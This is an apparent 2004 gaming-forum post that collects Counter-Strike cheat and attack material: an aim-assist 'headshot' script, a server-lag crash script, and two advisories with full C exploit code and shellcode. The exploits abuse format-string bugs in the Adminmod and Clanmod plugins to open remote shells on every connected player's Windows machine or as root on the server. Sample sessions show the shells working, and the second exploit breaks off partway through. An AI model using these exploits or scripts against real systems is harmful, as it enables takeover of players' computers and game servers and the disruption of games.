04.02.2004, 19:50
|
 - 1  |
| Gast
Beiträge: n/a
| 
Headshotscript: Code: // ; ________________________________ ; // ; ´¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯` ; // ; HeadShot Script v1.01 ; // ; ; // ; A ; // ; Work by date: 03-03-2003 ; // ; NaXiMuZ site: naximuz.tk ; // ; ________________________________ ; // ; `¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯´ ; echo "HeadShot Script Loaded..." alias x "speak fvox/blip" alias centerview "cl_pitchspeed 100000;+lookdown;wait;-lookdown;cl_pitchspeed 17799;+lookup;wait;-lookup" alias +headshot "-mlook;centerview;cl_pitchspeed 10;wait;+attack;+lookup;wait;-lookup" alias -headshot "-attack;+mlook" alias headshotOn "headshotBind;x;alias headshot headshotOff" alias headshotOff "defaultBind;x;alias headshot headshotOn" alias headshot "headshotOn" alias headshotBind "bind mouse1 +headshot;bind 1 fix1;bind 2 fix2;bind 3 fix3;bind 4 fix4;bind 5 fix5" alias defaultBind "bind mouse1 +attack;bind 1 slot1;bind 2 slot2;bind 3 slot3;bind 4 slot4;bind 5 slot5" alias fix1 "slot1;-headshot;bind mouse1 +headshot" alias fix2 "slot2;-headshot;bind mouse1 +headshot" alias fix3 "slot3;-attack;bind mouse1 +attack" alias fix4 "slot4;-attack;bind mouse1 +attack" alias fix5 "slot5;-attack;bind mouse1 +attack" // ... End of File. Code: //Myth Server Crash Script //http://onlinecheats.suddenlaunch2.com alias lag1 "timeleft; timeleft; timeleft; timeleft; timeleft; timeleft; timeleft; timeleft" alias lag2 "lag1; lag1; lag1; lag1; lag1; lag1; lag1; lag1" alias lag3 "lag2; lag2; lag2; lag2; lag2; lag2; lag2; lag2" alias lag4 "lag3; lag3; lag3; lag3; lag3; lag3; lag3; lag3" alias lag5 "lag4; lag4; lag4; lag4; lag4; lag4; lag4; lag4" alias lag6 "lag5; lag5; lag5; lag5; lag5; lag5; lag5; lag5" alias lag7 "lag6; lag6; lag6; lag6; lag6; lag6; lag6; lag6" alias lag8 "lag7; lag7; lag7; lag7; lag7; lag7; lag7; lag7" bind "p" "lag8" Code: Half-Life is the underlying game for the most popular online
game today, "Counter-Strike", and others.
Adminmod is a popular plugin to the half-life-server.
Overview
========
Due to a format string in the Half-Life *client*, it is
possible for an attacker who has rcon access to a game-
server that runs Adminmod, to exploit the machine of
a player that is connected to the game server.
No, even better, you can exploit ALL clients that play
on the server AT ONCE!
Note, the attacker needs to know the rcon-password.
However, it is easy to sniff since it is being transmitted
in plaintext.
Affected Versions
=================
Since there is always the latest version of Half-Life
and Counter-Strike required to play online, there is no
need to check for other affected versions; the current one
is vulnerable.
On the server-side, this bug can be exploited using
any Adminmod version.
Impact
======
High.
Details
=======
This seems to be a format string bug in the Half-Life-Client,
Adminmod has little to do with it. I found it by accident as I
blackboxed the admin_ssay and admin_psay commands.
The admin_ssay command sends a textmessage to all players.
After some calls the message eventually reaches the function
ClientPrint, which is called for every user object (i.e. every
player on the server) (util.cpp):
949 /* Rope's stuff */
950 void ClientPrint( entvars_t *client, int msg_dest, const char *msg_name,
951 const char *param1, const char *param2, const char *param3,
952 const char *param4 ) {
953
954 if ( ClientCheck(client) == 0 ) return;
955
956 if ( (g_msgTextMsg = GET_USER_MSG_ID(PLID, "TextMsg", 0)) == 0 ) {
957 g_msgTextMsg = REG_USER_MSG( "TextMsg", -1 );
958 } // if
959
960
961 MESSAGE_BEGIN( MSG_ONE, g_msgTextMsg, NULL, client );
962 WRITE_BYTE( msg_dest );
963 WRITE_STRING( msg_name );
964
965 if ( param1 )
966 WRITE_STRING( param1 );
967
968 if ( param2 )
969 WRITE_STRING( param2 );
970
971 if ( param3 )
972 WRITE_STRING( param3 );
973
974 if ( param4 )
975 WRITE_STRING( param4 );
976
977 MESSAGE_END();
978
979 }
Since I am no HLSDK developer, I have no idea what that MESSAGE_BEGIN
macros do, but I suspect that the Halflife-Client simply prints out
the message that was sent by the server using a format function,
without checking for evil characters. It seems that only some kind
of custom messages trigger this problem.
However, you can force the client to execute arbitrary commands that
eventually spawn a remote shell.
Solution
========
Disable adminmod until a patched version becomes available.
Change the rcon-password.
Exploit
=======
Please find attached a demonstration exploit. Note that it will
only work against Windows 2000/XP-Clients due to the architecture
of the shellcode (the server-OS is irrelevant). Other versions
can of course be exploited using different shellcodes.
When you execute the exploit against a victim, it will look
for him as if the game crashed (it freezes).
On the attacker side, if you don't want to exploit all clients
in one shot, you have to modify a command script of adminmod,
namely the "admin_psay" command so it doesn't send the
"(Private Msg from Admin): "-string to the client (would be
a bad thing because the IP jumps directly into that buffer).
This is left as an exercise to the reader.
Sample exploitation session
===========================
greuff@saturn:~$ ./hoagie_adminmod_client localhost 27015 myprecious greuff
Writing shellcode fragment at offset 5056...
Writing shellcode fragment at offset 4998...
Writing shellcode fragment at offset 4940...
Writing shellcode fragment at offset 4882...
Writing shellcode fragment at offset 4824...
Writing shellcode fragment at offset 4766...
Writing shellcode fragment at offset 4708...
Writing shellcode fragment at offset 4650...
Writing shellcode fragment at offset 4592...
Writing shellcode fragment at offset 4534...
Writing shellcode fragment at offset 4476...
Writing shellcode fragment at offset 4418...
Writing shellcode fragment at offset 4360...
Writing shellcode fragment at offset 4302...
Writing shellcode fragment at offset 4244...
Writing shellcode fragment at offset 4186...
Writing shellcode fragment at offset 4128...
Writing shellcode fragment at offset 4070...
Writing shellcode fragment at offset 4012...
Writing shellcode fragment at offset 3954...
Writing shellcode fragment at offset 3896...
Writing shellcode fragment at offset 3838...
Writing bootstrap at offset 3724...
Writing return into shellcode instructions...
Shell (hopefully) spawned at client host port 8008.
greuff@saturn:~$ telnet 192.168.0.2 8008
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\SIERRA\COUNTE~1>exit
Discovered by
=============
greuff <greuff@void.at>
Credits
=======
void.at
everyone who was at 19c3
====================================================
/*****************************************************************
* hoagie_adminmod_client.c
*
* Remote exploit for Halflife-Clients playing on a server running
* the Adminmod plugin.
*
* Spawns a shell at 8008/tcp.
*
* Author: greuff@void.at
*
* Credits:
* void.at
* Taeho Oh for using parts of his shellcode-connection code.
* deepzone.org for their shellcode-generator
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
* THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
* CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
*
*****************************************************************/
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>
char server_ip[20];
char rcon_pwd[30];
int server_port;
char player_nick[30];
#define STRADDR 0x19d4588
/*
-- portable NT/2k/XP ShellCode features ... www.deepzone.org
LoadLibraryA IT address 004AC2E0h
GetProcAddress IT address 004AC164h
XOR byte 9Fh
Remote port 8008
Style C
ATTENTION code modified by greuff: 0xff in the first line
changed to 0xfe because the HL-client filters out this
character.
Wrote a short bootstrap loader that changes this byte
again to 0xff. (dec %esp, dec %esp, dec %esp, dec %esp,
pop %esi, incb 0xf(%esi))
It additionally corrects the single '%' in the code that
is filtered out by the format-string-function. (offset 0x65)
Works only when the code gets executed by a ret! (buffer-
address has to lie on the stack)
*/
// total length: 1226 bytes
char *shellcode[] = {
"\x90\x90\x90\x4c\x4c\x4c\x4c\x5e\xfe\x46\x15\xfe\x46\x6b"
"\x68\x5e\x56\xc3\x90\x54\x59\xfe\xd1\x58\x33\xc9\xb1\x1c"
"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"
"\x90\x90\x90\xac\x34\x9f\xaa\xe2\xfa\x77\x9f\x9f\x9f\x9f",
"\xc2\x1e\x72\x46\xbe\xdf\x9f\x12\x2a\x6d\xbb\xdf\x9f\x12"
"\x22\x65\xbb\xdf\x9f\xf5\x98\x0f\x0f\x0f\x0f\xc6\x77\x4d"
"\x9d\x9f\x9f\x12\x2a\xb5\xba\xdf\x9f\x12\x22\xac\xba\xdf"
"\x9f\xf5\x95\x0f\x0f\x0f\x0f\xc6\x77\x24\x9d\x9f\x9f\xf5",
"\x9f\x12\x2a\x46\xba\xdf\x9f\xc9\x12\x2a\x7a\xba\xdf\x9f"
"\xc9\x12\x2a\x76\xba\xdf\x9f\xc9\x60\x0a\xac\xba\xdf\x9f"
"\xf5\x9f\x12\x2a\x46\xba\xdf\x9f\xc9\x12\x2a\x72\xba\xdf"
"\x9f\xc9\x12\x2a\x6e\xba\xdf\x9f\xc9\x60\x0a\xac\xba\xdf",
"\x9f\x58\x1a\x6a\xba\xdf\x9f\xdb\x9f\x9f\x9f\x12\x2a\x6a"
"\xba\xdf\x9f\xc9\x60\x0a\xa8\xba\xdf\x9f\x12\x2a\xb2\xb9"
"\xdf\x9f\x32\xcf\x60\x0a\xcc\xba\xdf\x9f\x12\x2a\xae\xb9"
"\xdf\x9f\x32\xcf\x60\x0a\xcc\xba\xdf\x9f\x12\x2a\x6e\xba",
"\xdf\x9f\x12\x22\xb2\xb9\xdf\x9f\x3a\x12\x2a\x7a\xba\xdf"
"\x9f\x32\x12\x22\xae\xb9\xdf\x9f\x34\x12\x22\xaa\xb9\xdf"
"\x9f\x34\x58\x1a\xba\xb9\xdf\x9f\x9f\x9f\x9f\x9f\x58\x1a"
"\xbe\xb9\xdf\x9f\x9e\x9e\x9f\x9f\x12\x2a\xa6\xb9\xdf\x9f",
"\xc9\x12\x2a\x6a\xba\xdf\x9f\xc9\xf5\x9f\xf5\x9f\xf5\x8f"
"\xf5\x9e\xf5\x9f\xf5\x9f\x12\x2a\xd6\xb9\xdf\x9f\xc9\xf5"
"\x9f\x60\x0a\xa4\xba\xdf\x9f\xf7\x9f\xbf\x9f\x9f\x0f\xf7"
"\x9f\x9d\x9f\x9f\x60\x0a\xdc\xba\xdf\x9f\x16\x1a\xce\xb9",
"\xdf\x9f\xac\x5f\xcf\xdf\xcf\xdf\xcf\x60\x0a\x65\xbb\xdf"
"\x9f\xcf\xc4\xf5\x8f\x12\x2a\x56\xba\xdf\x9f\xc9\xcc\x60"
"\x0a\x61\xbb\xdf\x9f\xf5\x9c\xcc\x60\x0a\x9d\xba\xdf\x9f"
"\x12\x2a\xca\xb9\xdf\x9f\xc9\x12\x2a\x56\xba\xdf\x9f\xc9",
"\xcc\x60\x0a\x99\xba\xdf\x9f\x12\x22\xc6\xb9\xdf\x9f\x34"
"\xac\x5f\xcf\x12\x22\xfa\xb9\xdf\x9f\xc8\xcf\xcf\xcf\x12"
"\x2a\x76\xba\xdf\x9f\x32\xcf\x60\x0a\xa0\xba\xdf\x9f\xf5"
"\xaf\x60\x0a\xd0\xba\xdf\x9f\x74\xd2\x0f\x0f\x0f\xac\x5f",
"\xcf\x12\x22\xfa\xb9\xdf\x9f\xc8\xcf\xcf\xcf\x12\x2a\x76"
"\xba\xdf\x9f\x32\xcf\x60\x0a\xa0\xba\xdf\x9f\xf5\xcf\x60"
"\x0a\xd0\xba\xdf\x9f\x1c\x22\xfa\xb9\xdf\x9f\x9d\x90\x1d"
"\x88\x9e\x9f\x9f\x1e\x22\xfa\xb9\xdf\x9f\x9e\xbf\x9f\x9f",
"\xed\x91\x0f\x0f\x0f\x0f\x58\x1a\xfa\xb9\xdf\x9f\x9f\xbf"
"\x9f\x9f\xf5\x9f\x14\x1a\xfa\xb9\xdf\x9f\x12\x22\xfa\xb9"
"\xdf\x9f\xc8\xcf\x14\x1a\xce\xb9\xdf\x9f\xcf\x12\x2a\x76"
"\xba\xdf\x9f\x32\xcf\x60\x0a\xd8\xba\xdf\x9f\xf5\xcf\x60",
"\x0a\xd0\xba\xdf\x9f\x14\x1a\xfa\xb9\xdf\x9f\xf5\x9f\xcf"
"\x12\x2a\xce\xb9\xdf\x9f\x32\xcf\x12\x2a\xc6\xb9\xdf\x9f"
"\x32\xcf\x60\x0a\x95\xba\xdf\x9f\xf5\x9f\x12\x22\xfa\xb9"
"\xdf\x9f\xc8\xf5\x9f\xf5\x9f\xf5\x9f\x12\x2a\x76\xba\xdf",
"\x9f\x32\xcf\x60\x0a\xa0\xba\xdf\x9f\xf5\xcf\x60\x0a\xd0"
"\xba\xdf\x9f\xac\x56\xa6\x12\xfa\xb9\xdf\x9f\x90\x18\xf8"
"\x60\x60\x60\xf5\x9f\xf7\x9f\xbf\x9f\x9f\x0f\x12\x2a\xce"
"\xb9\xdf\x9f\x32\xcf\x12\x2a\xc6\xb9\xdf\x9f\x32\xcf\x60",
"\x0a\x91\xba\xdf\x9f\x16\x1a\xfe\xb9\xdf\x9f\xf5\x9f\x12"
"\x22\xfa\xb9\xdf\x9f\xc8\xcf\x12\x2a\xce\xb9\xdf\x9f\x32"
"\xcf\x12\x2a\x72\xba\xdf\x9f\x32\xcf\x60\x0a\xd4\xba\xdf"
"\x9f\xf5\xcf\x60\x0a\xd0\xba\xdf\x9f\xf5\x9f\x14\x1a\xfe",
"\xb9\xdf\x9f\x12\x22\xfa\xb9\xdf\x9f\xc8\xcf\x14\x1a\xce"
"\xb9\xdf\x9f\xcf\x12\x2a\x76\xba\xdf\x9f\x32\xcf\x60\x0a"
"\xd8\xba\xdf\x9f\xf5\xcf\x60\x0a\xd0\xba\xdf\x9f\x76\x26"
"\x61\x60\x60\x12\x2a\xc6\xb9\xdf\x9f\x32\xcf\x60\x0a\x8d",
"\xba\xdf\x9f\x12\x2a\xc2\xb9\xdf\x9f\x32\xcf\x60\x0a\x8d"
"\xba\xdf\x9f\xf5\x9f\x60\x0a\xc8\xba\xdf\x9f\xce\xc9\xf7"
"\x7f\x5d\xd5\x9f\x0f\xc5\x60\x8d\xcf\xc4\xc6\xc8\xc1\xce"
"\xc9\xcc\xf7\xfb\x5e\xd5\x9f\x0f\xc5\x60\x8d\xcf\x33\x1b",
"\x5f\xea\x64\xc7\x34\xc6\x7d\x76\x5c\xc8\xcc\xd0\xdc\xd4"
"\xac\xad\x9f\xec\xf0\xfc\xf4\xfa\xeb\x9f\xfd\xf6\xf1\xfb"
"\x9f\xf3\xf6\xec\xeb\xfa\xf1\x9f\xfe\xfc\xfc\xfa\xef\xeb"
"\x9f\xec\xfa\xf1\xfb\x9f\xed\xfa\xfc\xe9\x9f\xfc\xf3\xf0",
"\xec\xfa\xec\xf0\xfc\xf4\xfa\xeb\x9f\xd4\xda\xcd\xd1\xda"
"\xd3\xac\xad\x9f\xdc\xed\xfa\xfe\xeb\xfa\xcf\xf6\xef\xfa"
"\x9f\xd8\xfa\xeb\xcc\xeb\xfe\xed\xeb\xea\xef\xd6\xf1\xf9"
"\xf0\xde\x9f\xdc\xed\xfa\xfe\xeb\xfa\xcf\xed\xf0\xfc\xfa",
"\xec\xec\xde\x9f\xcf\xfa\xfa\xf4\xd1\xfe\xf2\xfa\xfb\xcf"
"\xf6\xef\xfa\x9f\xd8\xf3\xf0\xfd\xfe\xf3\xde\xf3\xf3\xf0"
"\xfc\x9f\xcd\xfa\xfe\xfb\xd9\xf6\xf3\xfa\x9f\xc8\xed\xf6"
"\xeb\xfa\xd9\xf6\xf3\xfa\x9f\xcc\xf3\xfa\xfa\xef\x9f\xdc",
"\xf3\xf0\xec\xfa\xd7\xfe\xf1\xfb\xf3\xfa\x9f\xda\xe7\xf6"
"\xeb\xcf\xed\xf0\xfc\xfa\xec\xec\x9f\xdc\xf0\xfb\xfa\xfb"
"\xbf\xfd\xe6\xbf\xe3\xc5\xfe\xf1\xbf\xa3\xf6\xe5\xfe\xf1"
"\xdf\xfb\xfa\xfa\xef\xe5\xf0\xf1\xfa\xb1\xf0\xed\xf8\xa1",
"\x9d\x9f\x80\xd7\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f"
"\x9f\x9f\x93\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9e\x9f\x9f\x9f"
"\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f"
"\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f",
"\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f"
"\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f"
"\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f"
"\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f",
"\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f"
"\x9f\x9f\xdc\xd2\xdb\xb1\xda\xc7\xda\x9f\x9f\x9f\x9f\x9f"
"\x8f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f"
"\x9f\x9f\x9f\x9f\x9f\x9f\x96\x96\x96\x96\x96\x90\x90\x90"}; // = 22 blocks
char loader[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x4c\x4c\x4c\x4c\x5a\x31\xc9\xb1\x27\x42\xe2"
"\xfd\x52\x31\xc0\x31\xc9\x66\xbb\x38\x16\x88\xf9\x51\x88"
"\xd9\x40\x8a\x3c\x42\x88\x3a\x42\xe2\xf8\x59\xe2\xf1\xc3";
void create_conn(int *sock, char *host, int port)
{
struct sockaddr_in sin;
sin.sin_family=AF_INET;
sin.sin_port=htons(port);
if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);
if((*sock=socket(PF_INET,SOCK_DGRAM,0))<0) perror("socket"), exit(1);
}
void lowlevel_rcon(int sock, char *host, int port, char *cmd, char *reply)
{
char msg[100000];
struct sockaddr_in sin;
struct sockaddr_in sfrom;
fd_set fdset;
int dummy;
sin.sin_family=AF_INET;
sin.sin_port=htons(port);
if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);
sprintf(msg,"%c%c%c%c%s",0xff,0xff,0xff,0xff,cmd);
if(sendto(sock,msg,strlen(msg),0,(struct sockaddr *)&sin,sizeof(sin))<0)
perror("sendto"), exit(1);
if(reply)
{
if(recvfrom(sock,msg,2000,0,(struct sockaddr *)&sfrom,&dummy)<0)
perror("recvfrom"), exit(1);
if(strncmp(msg,"\xFF\xFF\xFF\xFF",4))
fprintf(stderr,"protocol error: reply\n"), exit(1);
strcpy(reply,msg+4);
}
}
void send_rcon(int sock, char *host, int port, char *rconpwd, char *cmd, char *reply_fun)
{
char reply[1000];
char msg[100000];
lowlevel_rcon(sock,host,port,"challenge rcon",reply);
if(!strstr(reply,"challenge rcon "))
fprintf(stderr,"protocol error\n"), exit(1);
reply[strlen(reply)-1]=0;
sprintf(msg,"rcon %s "%s" %s",reply+strlen("challenge rcon "),rconpwd,cmd);
if(reply_fun)
lowlevel_rcon(sock,host,port,msg,reply);
else
lowlevel_rcon(sock,host,port,msg,NULL);
if(reply_fun)
strcpy(reply_fun,reply);
}
int main(int argc, char **argv)
{
int sock, i,j;
int anzsc;
char reply[1000], command[100];
char evil_message[100000];
unsigned int offset, spaces;
unsigned long addr;
printf("hoagie_adminmod_client - remote exploit for half-life-clients\n");
printf("by greuff@void.at\n\n");
if(argc<4 || argc>5)
{
printf("Usage: %s server_ip server_port rcon_password [player_nick]\n\n",argv[0]);
exit(1);
}
strcpy(server_ip,argv[1]);
server_port=strtol(argv[2],NULL,10);
strcpy(rcon_pwd,argv[3]);
if(argc==5)
{
strcpy(player_nick,argv[4]);
sprintf(command,"admin_command admin_psay "%s"",player_nick);
}
else
{
player_nick[0]=0;
sprintf(command,"admin_command admin_ssay");
}
if(player_nick[0]==0)
{
printf("Sending to ALL clients! You have 3 sec to abort...\n");
sleep(3);
}
create_conn(&sock,server_ip,server_port);
/********* Step 1 - send the complete shellcode and the loader to the big buffer ***********/
offset=5000+112/2;
spaces=0;
for(i=21;i>=0;i--)
{
sprintf(evil_message,"%s ",command);
for(j=0;j<spaces;j++)
strcat(evil_message," ");
sprintf(reply,"%%%du%s",offset,shellcode[i]);
strcat(evil_message,reply);
printf("Writing shellcode fragment at offset %d...\n",offset);
send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);
offset-=strlen(shellcode[i])+2; // including \x0a\x00
}
/********* Step 2 - send the shellcode bootstrap loader ***********/
/* correct offset because the shell loader has the double size of a shellcode chunk */
offset-=strlen(shellcode[0]);
sprintf(evil_message,"%s ",command);
for(j=0;j<spaces;j++)
strcat(evil_message," ");
sprintf(reply,"%%%du%s",offset,loader);
strcat(evil_message,reply);
printf("Writing bootstrap at offset %d...\n",offset);
send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);
/********* Step 3 - construct the code that returns into the shellcode ************/
addr=STRADDR+offset+73+spaces;
sprintf(evil_message,"%s AA%c%c%c%c%c%c%%.f%%.f%%.f%%.f%%.f%%.%du%%n",
command,
0x68,addr&0xFF,(addr>>8)&0xFF,(addr>>16)&0xFF,(addr>>24)&0xFF,0xc3,734 /* 0x3cd-13
*/);
printf("Writing return into shellcode instructions...\n");
send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);
close(sock);
printf("Shell (hopefully) spawned at client host port 8008.\n");
return 0;
} Code: Clanmod[1] is a plugin for the "Half-Life Server", hosting
the most popular online game today, "Counter-Strike", among
others.
Overview
========
Due to a format string bug in clanmod, it is possible
for a remote attacker who knows the rcon-password to
remotely exploit the gameserver. Since most game-server-
admins I've seen are not very security-aware, the server
generally runs as root.
The rcon-password can be obtained using social engineering
or sniffing-techniques, since it is being transmitted
in plaintext. It is needed because the vulnerable function
can only be called via rcon.
Affected Versions
=================
All Clanmod versions on Windows and Linux.
Successfully tested with Clanmod 1.81.11 running on
hlds 3.1.1.0 on Linux.
Impact
======
High. Remote-shell and very likely remote-root.
Details
=======
This is a format string bug. Clanmod registers the command
"cm_log" to the halflife server, its purpose is to write a line
to the server log. This line is written using a printf-function
as seen in server.cpp:
2790 void CmdLogMessage()
2791 {
2792 if (CMD_ARGC() > 1) {
2793 UTIL_FillText((char*)CMD_ARGS()/*UTIL_GetVarArgs(1,FALSE)*/, NULL, 256,cmSet.allow_to_execute,NULL,
NULL,TRUE);
2794 UTIL_LogPrintf(UTIL_VarArgs("[%s] %s",Plugin_info.logtag, com_token));
2795 }
2796 else
2797 PrintErrorInfo("cm_log");
2798
2799 //Close any opened gate
2800 cmSet.allow_to_execute_time = gpGlobals->time + 0.25;
2801 }
Line 2794: UTIL_LogPrintf gets called with a user-supplied string.
UTIL_LogPrintf itself calls vsnprintf with no further checks.
rcon-output:
log on
cm_log %08x.%08x.%08x.%08x
-> [CLANMOD] 00000000.bfff0001.433a9984.433a9964
Solution
========
Disable clanmod until a patched version becomes available.
Change the rcon-password.
Exploit
=======
Please find attached a demonstration exploit. Note that it will
only work against a Linux-server due to the exploitation technique.
This does NOT mean that Windows-servers are not vulnerable, they
still suffer from the same hole.
Sample exploitation session
===========================
greuff@saturn:~$ ./hoagie_clanmod localhost 27015 myprecious
hoagie_clanmod - remote exploit for hlds servers using the clanmod plugin
by greuff@void.at
Getting stackpop count....
Stackpops found: 71, Padding: 1
Writing shellcode.....
Connecting to the shell...
Connect to the shell
id
uid=0(root) gid=0(root) groups=0(root),101(lpadmin)
exit
Discovered by
=============
greuff <greuff@void.at>
Credits
=======
void.at
everyone who was at 19c3
References
==========
[1] http://www.unitedadmins.com
==================================================================
/*****************************************************************
* hoagie_clanmod.c
*
* Remote exploit for Halflife-Servers running the Clanmod-Plugin
* (rcon-password required)
*
* Binds a shell to port 30464/tcp and connects to it.
*
* Author: greuff@void.at
*
* Tested on HL-Server v3.1.1.0 and ClanMod 1.81.11
*
* Credits:
* void.at
* Taeho Oh for using parts of his shellcode-connection code.
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
* THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
* CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
*
*****************************************************************/
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>
#define VSNPRINTF_GOT_ADDRESS 0x0804ce18
#define OFFSET 0x41414141
#define SB4(a) ((unsigned int)(a>>24))
#define SB3(a) ((unsigned int)((a>>16)&0xFF))
#define SB2(a) ((unsigned int)((a>>8)&0xFF))
#define SB1(a) ((unsigned int)(a&0XFF))
// forks and binds a shell to 30464/tcp. parent process exit()s.
char shellcode[] = "\x31\xc0\x40\x40\xcd\x80\x89\xc0\x85\xc0\x74\x06"
"\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51"
"\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x8d\x0c\x24\xcd"
"\x80\xb3\x02\xb1\x02\x31\xc9\x51\x51\x51\x80\xc1\x77"
"\x66\x51\xb1\x02\x66\x51\x8d\x0c\x24\xb2\x10\x52\x51"
"\x50\x8d\x0c\x24\x89\xc2\x31\xc0\xb0\x66\xcd\x80\xb3"
"\x01\x53\x52\x8d\x0c\x24\x31\xc0\xb0\x66\x80\xc3\x03"
"\xcd\x80\x31\xc0\x50\x50\x52\x8d\x0c\x24\xb3\x05\xb0"
"\x66\xcd\x80\x89\xc3\x31\xc9\x31\xc0\xb0\x3f\xcd\x80"
"\x41\x31\xc0\xb0\x3f\xcd\x80\x41\x31\xc0\xb0\x3f\xcd"
"\x80\x31\xdb\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x8d\x54\x24\x08\x31\xc9\x51\x53\x8d\x0c"
"\x24\x31\xc0\xb0\x0b\xcd\x80"
"\x31\xc0\xb0\x01\xcd\x80";
char server_ip[20];
char rcon_pwd[30];
int server_port;
int exec_sh(int sockfd)
{
char snd[4096],rcv[4096];
fd_set rset;
while(1)
{
FD_ZERO(&rset);
FD_SET(fileno(stdin),&rset);
FD_SET(sockfd,&rset);
select(255,&rset,NULL,NULL,NULL);
if(FD_ISSET(fileno(stdin),&rset))
{
memset(snd,0,sizeof(snd));
fgets(snd,sizeof(snd),stdin);
write(sockfd,snd,strlen(snd));
}
if(FD_ISSET(sockfd,&rset))
{
memset(rcv,0,sizeof(rcv));
if(read(sockfd,rcv,sizeof(rcv))<=0)
exit(0);
fputs(rcv,stdout);
}
}
}
int connect_sh()
{
int sockfd,i;
struct sockaddr_in sin;
printf("Connect to the shell\n");
fflush(stdout);
memset(&sin,0,sizeof(sin));
sin.sin_family=AF_INET;
sin.sin_port=htons(30464);
if(inet_aton(server_ip,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);
if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Can't create socket\n");
exit(0);
}
if(connect(sockfd,(struct sockaddr *)&sin,sizeof(sin))<0)
{
printf("Can't connect to the shell\n");
exit(0);
}
return sockfd;
}
void create_conn(int *sock, char *host, int port)
{
struct sockaddr_in sin;
struct timeval timeout;
sin.sin_family=AF_INET;
sin.sin_port=htons(port);
if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);
if((*sock=socket(PF_INET,SOCK_DGRAM,0))<0) perror("socket"), exit(1);
timeout.tv_sec=10;
timeout.tv_usec=0;
if(setsockopt(*sock,SOL_SOCKET,SO_RCVTIMEO,(const void *)&timeout,
sizeof(timeout))<0)
perror("setsockopt"),exit(1);
if(setsockopt(*sock,SOL_SOCKET,SO_SNDTIMEO,(const void *)&timeout,
sizeof(timeout))<0)
perror("setsockopt"),exit(1);
}
void lowlevel_rcon(int sock, char *host, int port, char *cmd, char *reply)
{
char msg[2000];
struct sockaddr_in sin;
struct sockaddr_in sfrom;
fd_set fdset;
int dummy;
usleep(100);
sin.sin_family=AF_INET;
sin.sin_port=htons(port);
if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);
sprintf(msg,"%c%c%c%c%s",0xff,0xff,0xff,0xff,cmd);
if(sendto(sock,msg,strlen(msg),0,(struct sockaddr *)&sin,sizeof(sin))<0)
perror("sendto"), exit(1);
if(reply)
{
if(recvfrom(sock,msg,2000,0,(struct sockaddr *)&sfrom,&dummy)<0)
{
if(errno==EAGAIN)
{
// resend message
printf("msg stalled, resending...\n");
sprintf(msg,"%c%c%c%c%s",0xff,0xff,0xff,0xff,cmd);
if(sendto(sock,msg,strlen(msg),0,(struct sockaddr *)&sin,sizeof(sin))<0)
perror("sendto"), exit(1);
else
printf("resend OK\n");
if(recvfrom(sock,msg,2000,0,(struct sockaddr *)&sfrom,&dummy)<0)
perror("recvfrom"),exit(1);
}
else
perror("recvfrom"), exit(1);
}
if(strncmp(msg,"\xFF\xFF\xFF\xFF",4))
fprintf(stderr,"protocol error: reply\n"), exit(1);
strcpy(reply,msg+4);
}
}
